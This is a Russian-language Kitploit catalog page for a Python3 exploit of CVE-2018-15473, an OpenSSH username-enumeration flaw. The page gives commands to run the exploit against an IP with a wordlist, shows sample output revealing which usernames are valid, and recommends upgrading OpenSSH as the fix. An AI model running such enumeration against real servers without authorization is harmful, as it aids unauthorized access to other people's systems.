Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - Username Enumeration | Kitploit
Инструменты/GitHubGitHub/sait-nuri/cve-2018-15473
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringPenetration TestingAuthentication
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - Username Enumeration

Репозиторий
42135 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-15473

Эксплойт для перебора имен пользователей SSH (OpenSSH 2.3 < 7.7)

Отредактированная версия оригинального эксплойта: https://www.exploit-db.com/exploits/45233

  • Преобразовано в Python3
  • Добавлена опция списка имен пользователей

Как запустить

root@kitploit:~
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
root@kitploit:~
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
root@kitploit:~
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
root@kitploit:~
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

Об уязвимости:

Система по-разному реагирует на попытки аутентификации с действительными и недействительными учетными данными. Удаленный пользователь может отправлять специально сформированные запросы для определения действительных имен пользователей на целевой системе. Таким образом, удаленный пользователь может определить действительные имена пользователей на целевой системе.

Решение:

Необходимо обновить OpenSSH-сервер до версии 7.7 или выше.

Скачать инструмент